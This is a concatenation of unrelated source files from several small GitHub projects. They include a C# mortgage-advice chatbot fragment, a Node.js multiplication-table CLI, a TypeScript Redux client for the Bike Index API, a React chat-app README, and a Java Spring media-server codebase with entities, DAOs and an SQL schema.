return string.Format("For **just £{0:0}** extra per month, you can **save up to £{1:0}k** and reduce your term by {2} years.", maxSavingDeal.MonthlyRepayment - customerData.Item1.MonthlyRepayment, (customerData.Item1.TotalRepayment - maxSavingDeal.TotalRepayment) / 1000, customerData.Item1.Term - maxSavingDeal.Term);
}
}
/// <summary>
/// Contains the waterfall dialog steps for the reserve-table dialog.
/// </summary>
private static class RemindLaterSteps
{
public static async Task<DialogTurnResult> StubAsync(
WaterfallStepContext stepContext,
CancellationToken cancellationToken)
{
await stepContext.Context.SendActivityAsync(
"Come back any time, " + ((IDictionary<string, object>)stepContext.Options)[Outputs.GivenName] + "!",
cancellationToken: cancellationToken);
return await stepContext.CancelAllDialogsAsync(cancellationToken);
}
}
private static class BestDealSteps
{
public static async Task<DialogTurnResult> ShowBestDealAsync(
WaterfallStepContext stepContext,
CancellationToken cancellationToken)
{
var activity = new Activity();
activity.Type = ActivityTypes.Typing;
activity.Text = "";
await stepContext.Context.SendActivityAsync("Let me bring up your details, " + ((IDictionary<string, object>)stepContext.Options)[Outputs.GivenName], cancellationToken: cancellationToken);
await stepContext.Context.SendActivityAsync(activity);
Thread.Sleep(2000);
var currentDeal = (Mortgage)((IDictionary<string, object>)stepContext.Options)[Outputs.CurrentMortgage];
//await stepContext.Context.SendActivityAsync(
// string.Format("Your current mortgage balance is £{0:0.##}k and your current deal is {1}. You pay £{2:0.##} per month and it will take you {3} years to clear your balance, for a total cost of £{4:0.##}k.", currentDeal.Balance / 1000, currentDeal.Description, currentDeal.MonthlyRepayment, currentDeal.Term, currentDeal.TotalRepayment / 1000), cancellationToken: cancellationToken);
//await stepContext.Context.SendActivityAsync(activity);
//Thread.Sleep(2000);
var bestDeal = (((IDictionary<string, object>)stepContext.Options)[Outputs.AvailableDeals] as IEnumerable<Mortgage>).OrderBy(m => m.TotalRepayment).First();
//await stepContext.Context.SendActivityAsync(
// string.Format("By increasing your monthly payments to £{0:0.##} and reducing your term to {1} years, your total repayment cost could be as low as £{2:0.##}k, saving you up to £{3:0.##}k. This is a {4} deal.", bestDeal.MonthlyRepayment, bestDeal.Term, bestDeal.TotalRepayment / 1000, (currentDeal.TotalRepayment - bestDeal.TotalRepayment) / 1000, bestDeal.Description), cancellationToken: cancellationToken);
await stepContext.Context.SendActivityAsync(string.Format(@"| | Current | Our best offer |
| ----- | ----- | ----- |
| Deal | {0} | {1} |
| Monthly Rate | £{2:0} | £{3:0} |
| Term | {4} | {5} |
| Balance | £{6:0.##}k | £{7:0.##}k |
| Total Repayment | £{8:0.##}k | £{9:0.##}k |", currentDeal.Description,bestDeal.Description,currentDeal.MonthlyRepayment,bestDeal.MonthlyRepayment,currentDeal.Term,bestDeal.Term,currentDeal.Balance/1000,currentDeal.Balance/1000,currentDeal.TotalRepayment/1000,bestDeal.TotalRepayment/1000), cancellationToken: cancellationToken);
return await stepContext.PromptAsync(
Inputs.Choice,
new PromptOptions
{
Prompt = Lists.BestDealPrompt,
RetryPrompt = Lists.BestDealReprompt,
Choices = Lists.BestDealChoices,
},
cancellationToken);
}
public static async Task<DialogTurnResult> ProcessInputAsync(
WaterfallStepContext stepContext,
CancellationToken cancellationToken)
{
// Begin a child dialog associated with the chosen option.
var choice = (FoundChoice)stepContext.Result;
var dialogId = Lists.BestDealOptions[choice.Index].DialogName;
switch (dialogId)
{
case Dialogs.CallBack:
await stepContext.Context.SendActivityAsync("One of our advisers will be with you shortly, on your mobile banking registered phone number.", cancellationToken: cancellationToken);
break;
case Dialogs.ApplyOnline:
await stepContext.Context.SendActivityAsync("Thank you. [Click here](https://personal.rbs.co.uk/personal/mortgages/secure/mortgage-agreement-in-principle.html) to complete your paperless application today.", cancellationToken: cancellationToken);
break;
}
return await stepContext.CancelAllDialogsAsync(cancellationToken);
}
public static async Task<DialogTurnResult> RepeatMenuAsync(
WaterfallStepContext stepContext,
CancellationToken cancellationToken)
{
// Start this dialog over again.
return await stepContext.ReplaceDialogAsync(MainMenu, null, cancellationToken);
}
}
}
}
<file_sep>using System;
namespace BasicBot.Models
{
/// <summary>A mortgage product: balance, rate and term plus derived repayment figures.</summary>
public class Mortgage
{
    // Product classification (enum declared elsewhere in the project).
    public MortgageType Type { get; set; }
    public bool IsUpForRenewal { get; set; }
    public string Description { get; set; }
    // Outstanding balance in pounds.
    public decimal Balance { get; set; }
    // Annual interest rate as a percentage (e.g. 1.35 for 1.35%).
    public decimal InterestRate { get; set; }
    // Remaining term in years.
    public int Term { get; set; }

    /// <summary>
    /// Monthly repayment from the standard amortisation formula
    /// P * r * (1+r)^n / ((1+r)^n - 1), with r the monthly rate and n the
    /// number of monthly payments.
    /// </summary>
    public decimal MonthlyRepayment
    {
        get
        {
            // Guard degenerate inputs: the formula divides by (1+r)^n - 1,
            // which is zero when the rate or term is zero and previously
            // yielded NaN and an OverflowException on the cast to decimal.
            if (Term <= 0)
            {
                return 0m;
            }
            if (InterestRate == 0m)
            {
                // Interest-free: straight-line repayment of the balance.
                return Balance / (Term * 12);
            }
            double monthlyRate = (double)InterestRate / 1200.0;
            double factor = Math.Pow(1 + monthlyRate, Term * 12);
            return (decimal)((double)Balance * monthlyRate * (factor / (factor - 1)));
        }
    }

    /// <summary>Twelve monthly repayments.</summary>
    public decimal AnnualRepayment
    {
        get
        {
            return MonthlyRepayment * 12.0M;
        }
    }

    /// <summary>Total cost over the full remaining term.</summary>
    public decimal TotalRepayment
    {
        get
        {
            return AnnualRepayment * Term;
        }
    }
}
}
| 20186d46b98f78054e81afa5a6a9ffb503f61a51 | [
"C#"
] | 5 | C# | gabi-radu/milly | 9eeb27d84a79ad6f8dccfcc1f0ba7e2e6409040b | 7cae1111db696c5b1ba9d24fdaebd8e2f4f639d8 |
refs/heads/main | <repo_name>AndreaGonzalez14/node-tabla-multiplicar<file_sep>/app.js
//Path relativo
//const multiplicar = require('./multiplicar/multiplicar')
const { alias } = require('yargs'); // NOTE(review): `alias` is never used; import kept to avoid altering file-level requires.
const { crearArchivo, listarTabla } = require('./multiplicar/multiplicar')
const yarg = require('./config/yargs').argv;

// The first positional argument selects the sub-command (crear | imprimir).
let comando = yarg._[0]
switch (comando) {
    case 'crear':
        // Generates the multiplication-table file and reports the created path.
        crearArchivo(yarg.base, yarg.limite).then(salida => {
            console.log(salida);
        }).catch(error => {
            console.log(error);
        })
        break;
    case 'imprimir':
        // Prints the table to the console; only failures need reporting here.
        listarTabla(yarg.base, yarg.limite).catch(error => {
            console.log(error);
        })
        break;
    default:
        // Previously unknown commands failed silently; give the user feedback.
        console.log(`Comando no reconocido: ${comando}`);
        break;
}
"JavaScript"
] | 1 | JavaScript | AndreaGonzalez14/node-tabla-multiplicar | eb5e99b26e122798a9078083ecae298e0124bf56 | ae75c36c0ff0a778901df71f9138433e90735a0b |
refs/heads/main | <repo_name>ClaudioTanca/bike-index-app<file_sep>/src/models/bikeCountResponse.ts
/** Counts returned by the Bike Index `/search/count` endpoint, split by stolenness category. */
export interface BikeCountResponse {
  non: number;
  stolen: number;
  proximity: number;
}<file_sep>/src/store/index.ts
import { configureStore } from '@reduxjs/toolkit';
import { bikeFeature } from '../features/bikes/bike.slice';
import paginationReducer from "../features/pagination/pagination.slice";
import searchReducer from '../features/search/search.slice'
// Root Redux store: mounts the RTK Query bike slice (under its reducerPath)
// alongside plain pagination and search slices, and appends the RTK Query
// middleware required for caching and request lifecycle handling.
export const store = configureStore({
  reducer: {
    [bikeFeature.reducerPath]: bikeFeature.reducer,
    pagination: paginationReducer,
    search: searchReducer
  },
  middleware: (defaultMiddleware) => {
    return defaultMiddleware().concat(bikeFeature.middleware)
  }
});

// Convenience type for typed dispatch hooks.
export type AppDispatch = typeof store.dispatch;
export type RootState = ReturnType<typeof store.getState>;<file_sep>/src/features/bikes/bike.slice.ts
import { createApi, fetchBaseQuery } from "@reduxjs/toolkit/query/react";
import {BASE_URL, BERLIN_LOCATION} from "../../utils/const";
import {Bike, BikeCountRequest, BikeCountResponse, BikeSearchRequest} from '../../models';
import {asUrParams} from "../../utils/functions";
/**
 * RTK Query API slice for the Bike Index search endpoints.
 * Exposes `getBikes` (paged search results) and `getBikesCount` (result counts).
 */
export const bikeFeature = createApi({
  reducerPath: 'bikes',
  baseQuery: fetchBaseQuery({
    baseUrl: BASE_URL
  }),
  endpoints: (builder) => {
    return {
      getBikes: builder.query<Bike[], BikeSearchRequest | void>({
        query({page = 1, per_page = 10, stolenness = "proximity", location = BERLIN_LOCATION, distance = "10", query}: BikeSearchRequest) {
          // asUrParams already returns a string; the original called
          // .toString() on it redundantly.
          const params = asUrParams({page, per_page, stolenness, location, distance, query});
          return `/search?${params}`;
        },
        // Results depend on location/query; never serve stale cache.
        keepUnusedDataFor: 0,
        transformResponse: (response: { bikes: Bike[] }): Bike[] | Promise<Bike[]> => response.bikes
      }),
      getBikesCount: builder.query<BikeCountResponse, BikeCountRequest | void>({
        query({stolenness = "proximity", location = BERLIN_LOCATION, distance = "10", query}: BikeCountRequest) {
          const params = asUrParams({stolenness, location, distance, query});
          return `/search/count?${params}`;
        },
        keepUnusedDataFor: 0,
      })
    }
  }
})
export const { useGetBikesQuery, useGetBikesCountQuery } = bikeFeature;<file_sep>/src/models/bikeComponent.ts
/** A component (part) fitted to a bike, as returned by the Bike Index API. */
export interface BikeComponent {
  id: number;
  description: string;
  serial_number: string;
  component_type: string;
  component_group: string;
  // Shape of these two is not constrained here — presumably API flags; confirm.
  rear?: any;
  front?: any;
  manufacturer_name: string;
  model_name: string;
  year?: number;
}<file_sep>/src/models/bikeStolenRecord.ts
/** Theft report attached to a stolen bike (Bike Index API shape). */
export interface BikeStolenRecord {
  // Numeric timestamp — presumably Unix seconds (formatDate multiplies by 1000); confirm.
  date_stolen: number;
  location: string;
  latitude: number;
  longitude: number;
  theft_description: string;
  locking_description: string;
  lock_defeat_description: string;
  police_report_number: string;
  police_report_department: string;
  created_at: number;
  create_open311: boolean;
  id: number;
}<file_sep>/src/utils/const.ts
// Root of the public Bike Index REST API, version 3.
export const BASE_URL = "https://bikeindex.org/api/v3";
export const BERLIN_LOCATION = "52.520008,13.404954";<file_sep>/src/models/bike.ts
import {BikeStolenRecord} from "./bikeStolenRecord";
import {BikeComponent} from "./bikeComponent";
import {BikeImage} from "./bikeImage";
/**
 * A bike registration as returned by the Bike Index search API, including
 * theft details, public images and fitted components.
 */
export interface Bike {
  date_stolen: number;
  description: string;
  frame_colors: string[];
  frame_model: string;
  id: number;
  is_stock_img: boolean;
  large_img: string;
  location_found?: string;
  manufacturer_name: string;
  external_id?: any;
  registry_name?: string;
  registry_url?: string;
  serial: string;
  status?: any;
  stolen: boolean;
  stolen_location: string;
  thumb: string;
  title: string;
  url: string;
  year: number;
  registration_created_at: number;
  registration_updated_at: number;
  api_url: string;
  manufacturer_id: number;
  paint_description?: string;
  name: string;
  frame_size: string;
  rear_tire_narrow: boolean;
  front_tire_narrow: boolean;
  type_of_cycle: string;
  test_bike: boolean;
  rear_wheel_size_iso_bsd: number;
  front_wheel_size_iso_bsd: number;
  handlebar_type_slug: string;
  frame_material_slug?: string;
  front_gear_type_slug: string;
  rear_gear_type_slug: string;
  additional_registration: string;
  // Nested structures defined in the sibling model files.
  stolen_record: BikeStolenRecord;
  public_images: BikeImage[];
  components: BikeComponent[];
}<file_sep>/src/utils/functions.ts
/** Formats a Unix timestamp given in seconds as "<local date> at <local time>". */
export function formatDate(source: number) {
  const asDate = new Date(source * 1000);
  return `${asDate.toLocaleDateString()} at ${asDate.toLocaleTimeString()}`;
}
/**
 * Serializes an object's truthy properties into a URL query string.
 * Falsy values (undefined, null, "", 0, false) are skipped, matching the
 * original behavior of dropping absent optional search parameters.
 * Replaces the reduce + @ts-ignore + redundant double .toString() version.
 */
export function asUrParams(source: Record<string, unknown>): string {
  const params = new URLSearchParams();
  for (const [key, value] of Object.entries(source)) {
    if (value) {
      params.set(key, String(value));
    }
  }
  return params.toString();
}
/** Builds the 1-based sequence [1, 2, …, size] (used for page numbering). */
export function range(size: number) {
  const oneBased = (_element: unknown, index: number) => index + 1;
  return Array.from({ length: size }, oneBased);
}<file_sep>/src/models/bikeSearchResponse.ts
import {Bike} from "./bike";
/** Envelope returned by the Bike Index `/search` endpoint. */
export interface BikeSearchResponse {
  bikes: Bike[]
}

/** Query parameters accepted by `/search`; all optional — defaults are applied in the API slice. */
export interface BikeSearchRequest {
  page?: number;
  per_page?: number;
  // "latitude,longitude" string used for proximity searches.
  location?: string;
  // Search radius; passed as a string to the API.
  distance?: string;
  stolenness?: "all" | "non" | "stolen" | "proximity";
  query?: string;
}

/** Query parameters accepted by `/search/count` (no paging). */
export interface BikeCountRequest {
  location?: string;
  distance?: string;
  stolenness?: "all" | "non" | "stolen" | "proximity";
  query?: string;
}<file_sep>/src/features/pagination/pagination.slice.ts
import {createSlice, PayloadAction} from "@reduxjs/toolkit";
/** Shape of the pagination slice: 1-based current page plus page metadata. */
export interface PaginationState {
  currentPage: number,
  pageCount: number,
  pageSize: number
}

const initialState: PaginationState = {
  currentPage: 1,
  pageCount: 1,
  pageSize: 10
}

const paginationSlice = createSlice({
  name: 'pagination',
  initialState,
  reducers: {
    // Fixed: goNext/goPrev previously moved unconditionally, so the page
    // could leave the valid range [1, pageCount] (e.g. page 0 sent to the API).
    goNext(state) {
      if (state.currentPage < state.pageCount) {
        state.currentPage++
      }
    },
    goPrev(state) {
      if (state.currentPage > 1) {
        state.currentPage--
      }
    },
    goFirst(state) {
      state.currentPage = 1
    },
    goLast(state) {
      state.currentPage = state.pageCount
    },
    setPageCount(state, action: PayloadAction<number>) {
      // Falsy payloads (0, NaN) fall back to a single page, as before.
      state.pageCount = action.payload || 1;
      // Keep the current page valid when the result set shrinks.
      if (state.currentPage > state.pageCount) {
        state.currentPage = state.pageCount;
      }
    }
  }
})

export const { goFirst, goLast, goNext, goPrev, setPageCount } = paginationSlice.actions;
export default paginationSlice.reducer;<file_sep>/src/features/search/search.slice.ts
import {createSlice, PayloadAction} from "@reduxjs/toolkit";
/** Free-text search term shared across the app. */
interface SearchState {
  query: string
}

const initialState: SearchState = {
  query: ''
}

const searchSlice = createSlice({
  name: 'search',
  initialState,
  reducers: {
    // Replaces the current search term.
    setQuery(state, action: PayloadAction<string>) {
      state.query = action.payload;
    },
    // Clears the term back to the initial empty string.
    resetQuery(state) {
      state.query = ''
    }
  }
});

export const { setQuery, resetQuery } = searchSlice.actions;
export default searchSlice.reducer;<file_sep>/src/models/index.ts
// Barrel module: re-exports every model type so consumers can import from '../models'.
export * from './bike';
export * from './bikeImage';
export * from './bikeComponent';
export * from './bikeStolenRecord';
export * from './bikeCountResponse';
export * from './bikeSearchResponse';<file_sep>/src/models/bikeImage.ts
/** One public image of a bike, in the size variants served by the API. */
export interface BikeImage {
  name: string;
  full: string;
  large: string;
  medium: string;
  thumb: string;
  id: number;
}
"TypeScript"
] | 13 | TypeScript | ClaudioTanca/bike-index-app | da26eb91efd5f11c4cd27afceca6d13b06c7432d | e07f5871f4e0b030d06715a18c689eb4926c0f1e |
refs/heads/master | <file_sep>## Projeto WhatsLab
> Este projeto é uma atividade proposta pela Labenu. Nosso objetivo é criar um sitefictício para um App de mensagens.
## 🤝 Membros do projeto
<NAME>
<NAME>
## Imagens



## ✅ O que está funcionando
As mensagens estão aparecendo na tela, o botão de enviar está funcionando, e está responsivo.
## 🌎 Como acessar o projeto
http://moldy-vein.surge.sh
<file_sep>import { render } from '@testing-library/react';
import React from 'react';
import styled from 'styled-components';
import Inputs from './components/inputs/inputs';
// Full-viewport flex wrapper that centers the chat UI on a light grey background.
const MainContainer = styled.div`
display:flex;
justify-content: center;
align-items: center;
flex-direction: row;
height: 100vh;
background-color: #ededed;
width: 100vw;
`
function App() {
render()
return (
<MainContainer>
<Inputs />
</MainContainer>
);
}
export default App;
| 9e3d2775b77aeeb9611d38c1b4a5a49ffa334c77 | [
"Markdown",
"JavaScript"
] | 2 | Markdown | future4code/banu-whatslab1 | 6f7ec29f876b6ff21a46b16b75602d005d11a2c3 | 1a115df98a77f54d408916111e6c4514941c2231 |
refs/heads/master | <repo_name>Tomaltach/MediaServer<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/dao/mapper/BookMapper.java
package ie.tom.mediaserver.dao.mapper;
import ie.tom.mediaserver.entity.Book;
import java.sql.ResultSet;
import java.sql.SQLException;
import org.springframework.jdbc.core.RowMapper;
/**
 * Maps one row of the {@code book} table onto a {@link Book} instance for
 * Spring's JdbcTemplate.
 */
public class BookMapper implements RowMapper<Book> {

    @Override
    public Book mapRow(ResultSet resultSet, int rowNum) throws SQLException {
        final Book book = new Book();
        book.setBook_id(resultSet.getInt("book_id"));
        book.setBook_name(resultSet.getString("book_name"));
        book.setBook_genre(resultSet.getString("book_genre"));
        book.setBook_year(resultSet.getInt("book_year"));
        book.setBook_author(resultSet.getString("book_author"));
        book.setFile_name(resultSet.getString("file_name"));
        book.setFile_type(resultSet.getString("file_type"));
        book.setFile_path(resultSet.getString("file_path"));
        return book;
    }
}
<file_sep>/README.md
# MediaServer
A media server that provides a central hub of movies, music, books, etc., accessible from a webpage. It is designed primarily for a local setup — say, a home media server — but can also be used for a larger public site if desired.
<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/entity/Loan.java
package ie.tom.mediaserver.entity;
import java.util.Date;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.Table;
import javax.validation.constraints.NotNull;
import javax.xml.bind.annotation.XmlRootElement;
import org.springframework.format.annotation.DateTimeFormat;
/**
 * JPA entity mapping the {@code loan} table: records which member has
 * borrowed which media item and when the loan started.
 */
@Entity
@XmlRootElement
@Table(name="loan")
public class Loan {

    // Surrogate key generated by the database (IDENTITY column).
    @Id
    @GeneratedValue(strategy=GenerationType.IDENTITY)
    private int loan_id;

    // Raw foreign keys; no JPA relationship mappings are used.
    // NOTE(review): @NotNull on primitive ints is a no-op (they can never be null).
    @NotNull
    private int member_id;

    @NotNull
    private int media_id;

    // Loan start date. NOTE(review): java.util.Date is mutable and shared
    // directly by the accessors — consider defensive copies.
    @NotNull
    @DateTimeFormat
    private Date loan_date;

    public int getLoan_id() {
        return loan_id;
    }
    public void setLoan_id(int loan_id) {
        this.loan_id = loan_id;
    }
    public int getMember_id() {
        return member_id;
    }
    public void setMember_id(int member_id) {
        this.member_id = member_id;
    }
    public int getMedia_id() {
        return media_id;
    }
    public void setMedia_id(int media_id) {
        this.media_id = media_id;
    }
    public Date getLoan_date() {
        return loan_date;
    }
    public void setLoan_date(Date loan_date) {
        this.loan_date = loan_date;
    }
}<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/service/MemberService.java
package ie.tom.mediaserver.service;
import java.util.List;
import ie.tom.mediaserver.entity.Member;
import org.springframework.stereotype.Service;
import org.springframework.transaction.annotation.Propagation;
import org.springframework.transaction.annotation.Transactional;
/** Service-layer contract for member management, executed inside a transaction. */
@Service
@Transactional(propagation=Propagation.REQUIRED)
// NOTE(review): @Service/@Transactional are usually placed on the implementing
// class rather than on the interface — confirm the intended wiring.
public interface MemberService {

    /** Persists a new member. */
    void add(Member member);
    /** Updates an existing member. */
    void update(Member member);
    /** Saves a member (add-or-update semantics defined by the implementation). */
    void save(Member member);
    /** Removes the given member. */
    void delete(Member member);
    /** Looks a member up by primary key. */
    Member findMemberById(int member_id);
    /** Returns every registered member. */
    List<Member> findAllMembers();
    /** Presumably returns members with overdue loans — see the implementation. */
    List<Member> findAllOverdueMembers();
}
<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/dao/MemberDao.java
package ie.tom.mediaserver.dao;
import ie.tom.mediaserver.entity.Member;
import java.util.List;
import org.springframework.stereotype.Repository;
/** Data-access contract for {@link Member} rows. */
@Repository
public interface MemberDao {

    void addMember(Member member);
    void updateMember(Member member);
    void saveMember(Member member);
    void deleteMember(Member member);
    // Single-result lookups (id and username are expected to be unique).
    Member findById(int member_id);
    Member findByUserName(String userName);
    // Multi-result lookups on non-unique columns.
    List<Member> findByFirstName(String firstName);
    List<Member> findByLastName(String lastName);
    List<Member> findByEmail(String email);
    List<Member> findAll();
}
<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/entity/Movie.java
package ie.tom.mediaserver.entity;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.Table;
import javax.validation.constraints.NotNull;
import javax.validation.constraints.Size;
import javax.xml.bind.annotation.XmlRootElement;
import org.hibernate.validator.constraints.NotEmpty;
/**
 * JPA entity mapping the {@code movie} table: catalogue metadata plus the
 * backing file's name, type and path on disk.
 */
@Entity
@XmlRootElement
@Table(name="movie")
public class Movie {

    // Surrogate key generated by the database (IDENTITY column).
    @Id
    @GeneratedValue(strategy=GenerationType.IDENTITY)
    private int movie_id;

    @NotEmpty
    @Size(min=4, max=50)
    private String movie_name;

    @NotEmpty
    @Size(min=4, max=25)
    private String movie_genre;

    // Release year. NOTE(review): @NotNull on a primitive int is a no-op.
    @NotNull
    private int movie_year;

    // Name, type and path of the media file on disk.
    // NOTE(review): these @Size limits (max 50) differ from the SQL schema
    // (file_name/file_path VARCHAR(255), file_type VARCHAR(10)) — confirm.
    @NotEmpty
    @Size(min=4, max=50)
    private String file_name;

    @NotEmpty
    @Size(min=4, max=50)
    private String file_type;

    @NotEmpty
    @Size(min=4, max=50)
    private String file_path;

    // Plain accessors below; no additional logic.
    public int getMovie_id() {
        return movie_id;
    }
    public void setMovie_id(int movie_id) {
        this.movie_id = movie_id;
    }
    public String getMovie_name() {
        return movie_name;
    }
    public void setMovie_name(String movie_name) {
        this.movie_name = movie_name;
    }
    public String getMovie_genre() {
        return movie_genre;
    }
    public void setMovie_genre(String movie_genre) {
        this.movie_genre = movie_genre;
    }
    public int getMovie_year() {
        return movie_year;
    }
    public void setMovie_year(int movie_year) {
        this.movie_year = movie_year;
    }
    public String getFile_name() {
        return file_name;
    }
    public void setFile_name(String file_name) {
        this.file_name = file_name;
    }
    public String getFile_type() {
        return file_type;
    }
    public void setFile_type(String file_type) {
        this.file_type = file_type;
    }
    public String getFile_path() {
        return file_path;
    }
    public void setFile_path(String file_path) {
        this.file_path = file_path;
    }
}<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/dao/MovieDao.java
package ie.tom.mediaserver.dao;
import ie.tom.mediaserver.entity.Movie;
import java.util.List;
import org.springframework.stereotype.Repository;
/** Data-access contract for {@link Movie} rows. */
@Repository
public interface MovieDao {

    void addMovie(Movie movie);
    void updateMovie(Movie movie);
    void saveMovie(Movie movie);
    void deleteMovie(Movie movie);
    /** Primary-key lookup. */
    Movie findById(int movie_id);
    // Attribute-based searches.
    List<Movie> findByName(String movie_name);
    List<Movie> findByGenre(String movie_genre);
    List<Movie> findByYear(int movie_year);
    List<Movie> findAll();
}
<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/dao/MusicDao.java
package ie.tom.mediaserver.dao;
import ie.tom.mediaserver.entity.Music;
import java.util.List;
import org.springframework.stereotype.Repository;
/** Data-access contract for {@link Music} rows. */
@Repository
public interface MusicDao {

    void addMusic(Music music);
    void updateMusic(Music music);
    void saveMusic(Music music);
    void deleteMusic(Music music);
    /** Primary-key lookup. */
    Music findById(int music_id);
    // Attribute-based searches.
    List<Music> findByName(String music_name);
    List<Music> findByGenre(String music_genre);
    List<Music> findByYear(int music_year);
    List<Music> findByArtist(String music_artist);
    List<Music> findByAlbum(String music_album);
    List<Music> findAll();
}
<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/dao/mapper/LoanMapper.java
package ie.tom.mediaserver.dao.mapper;
import ie.tom.mediaserver.entity.Loan;
import java.sql.ResultSet;
import java.sql.SQLException;
import org.springframework.jdbc.core.RowMapper;
/**
 * Maps one row of the {@code loan} table onto a {@link Loan} instance for
 * Spring's JdbcTemplate.
 */
public class LoanMapper implements RowMapper<Loan> {

    @Override
    public Loan mapRow(ResultSet resultSet, int rowNum) throws SQLException {
        final Loan loan = new Loan();
        loan.setLoan_id(resultSet.getInt("loan_id"));
        loan.setMember_id(resultSet.getInt("member_id"));
        loan.setMedia_id(resultSet.getInt("media_id"));
        loan.setLoan_date(resultSet.getDate("loan_date"));
        return loan;
    }
}
<file_sep>/MediaCore/target/classes/ie/tom/mediaserver/setup-database.sql
-- Schema for the media_server application.
CREATE DATABASE media_server;
-- Added: without USE, the tables were created in whatever database was active.
USE media_server;

-- Maps a member to a granted permission; one row per (member, permission) pair.
CREATE TABLE permission (
    member_id INT NOT NULL,
    permission VARCHAR(25) NOT NULL
);

-- AUTO_INCREMENT added to all surrogate keys: the JPA entities use
-- GenerationType.IDENTITY, which requires identity columns.
CREATE TABLE member (
    member_id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,
    username VARCHAR(50) NOT NULL,
    first_name VARCHAR(50),
    last_name VARCHAR(50),
    email VARCHAR(255) NOT NULL
);

-- Added: the Loan entity (@Table(name = "loan")) had no backing table.
CREATE TABLE loan (
    loan_id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,
    member_id INT NOT NULL,
    media_id INT NOT NULL,
    loan_date DATE NOT NULL
);

-- Fixed: the original used ';' instead of ',' after the PRIMARY KEY column in
-- movie/music/book, which aborted those CREATE TABLE statements.
CREATE TABLE movie (
    movie_id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,
    movie_name VARCHAR(255) NOT NULL,
    movie_genre VARCHAR(25) NOT NULL,
    movie_year INT NOT NULL,
    file_name VARCHAR(255) NOT NULL,
    file_type VARCHAR(10) NOT NULL,
    file_path VARCHAR(255) NOT NULL
);

CREATE TABLE music (
    song_id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,
    song_name VARCHAR(255) NOT NULL,
    song_genre VARCHAR(25) NOT NULL,
    song_year INT NOT NULL,
    song_artist VARCHAR(50) NOT NULL,
    song_album VARCHAR(50) NOT NULL,
    song_track_no INT,
    song_track_no_of INT,
    file_name VARCHAR(255) NOT NULL,
    file_type VARCHAR(10) NOT NULL,
    file_path VARCHAR(255) NOT NULL
);

CREATE TABLE book (
    book_id INT NOT NULL AUTO_INCREMENT PRIMARY KEY,
    book_name VARCHAR(255) NOT NULL,
    book_genre VARCHAR(25) NOT NULL,
    book_year INT NOT NULL,
    book_author VARCHAR(50) NOT NULL,
    file_name VARCHAR(255) NOT NULL,
    file_type VARCHAR(10) NOT NULL,
    file_path VARCHAR(255) NOT NULL
);<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/dao/mapper/MovieMapper.java
package ie.tom.mediaserver.dao.mapper;
import java.sql.ResultSet;
import java.sql.SQLException;
import ie.tom.mediaserver.entity.Movie;
import org.springframework.jdbc.core.RowMapper;
/**
 * Maps one row of the {@code movie} table onto a {@link Movie} instance for
 * Spring's JdbcTemplate.
 */
public class MovieMapper implements RowMapper<Movie> {

    @Override
    public Movie mapRow(ResultSet resultSet, int rowNum) throws SQLException {
        final Movie movie = new Movie();
        movie.setMovie_id(resultSet.getInt("movie_id"));
        movie.setMovie_name(resultSet.getString("movie_name"));
        movie.setMovie_genre(resultSet.getString("movie_genre"));
        movie.setMovie_year(resultSet.getInt("movie_year"));
        movie.setFile_name(resultSet.getString("file_name"));
        movie.setFile_type(resultSet.getString("file_type"));
        movie.setFile_path(resultSet.getString("file_path"));
        return movie;
    }
}
<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/entity/Book.java
package ie.tom.mediaserver.entity;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.Table;
import javax.validation.constraints.NotNull;
import javax.validation.constraints.Size;
import javax.xml.bind.annotation.XmlRootElement;
import org.hibernate.validator.constraints.NotEmpty;
/**
 * JPA entity mapping the {@code book} table: catalogue metadata plus the
 * backing file's name, type and path on disk.
 */
@Entity
@XmlRootElement
@Table(name="book")
public class Book {

    // Surrogate key generated by the database (IDENTITY column).
    @Id
    @GeneratedValue(strategy=GenerationType.IDENTITY)
    private int book_id;

    @NotEmpty
    @Size(min=4, max=50)
    private String book_name;

    @NotEmpty
    @Size(min=4, max=25)
    private String book_genre;

    // Publication year. NOTE(review): @NotNull on a primitive int is a no-op.
    @NotNull
    private int book_year;

    @NotEmpty
    @Size(min=4, max=50)
    private String book_author;

    // Name, type and path of the media file on disk.
    // NOTE(review): max=50 differs from the SQL schema's VARCHAR(255)/(10) — confirm.
    @NotEmpty
    @Size(min=4, max=50)
    private String file_name;

    @NotEmpty
    @Size(min=4, max=50)
    private String file_type;

    @NotEmpty
    @Size(min=4, max=50)
    private String file_path;

    // Plain accessors below; no additional logic.
    public int getBook_id() {
        return book_id;
    }
    public void setBook_id(int book_id) {
        this.book_id = book_id;
    }
    public String getBook_name() {
        return book_name;
    }
    public void setBook_name(String book_name) {
        this.book_name = book_name;
    }
    public String getBook_genre() {
        return book_genre;
    }
    public void setBook_genre(String book_genre) {
        this.book_genre = book_genre;
    }
    public int getBook_year() {
        return book_year;
    }
    public void setBook_year(int book_year) {
        this.book_year = book_year;
    }
    public String getBook_author() {
        return book_author;
    }
    public void setBook_author(String book_author) {
        this.book_author = book_author;
    }
    public String getFile_name() {
        return file_name;
    }
    public void setFile_name(String file_name) {
        this.file_name = file_name;
    }
    public String getFile_type() {
        return file_type;
    }
    public void setFile_type(String file_type) {
        this.file_type = file_type;
    }
    public String getFile_path() {
        return file_path;
    }
    public void setFile_path(String file_path) {
        this.file_path = file_path;
    }
}<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/entity/Music.java
package ie.tom.mediaserver.entity;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
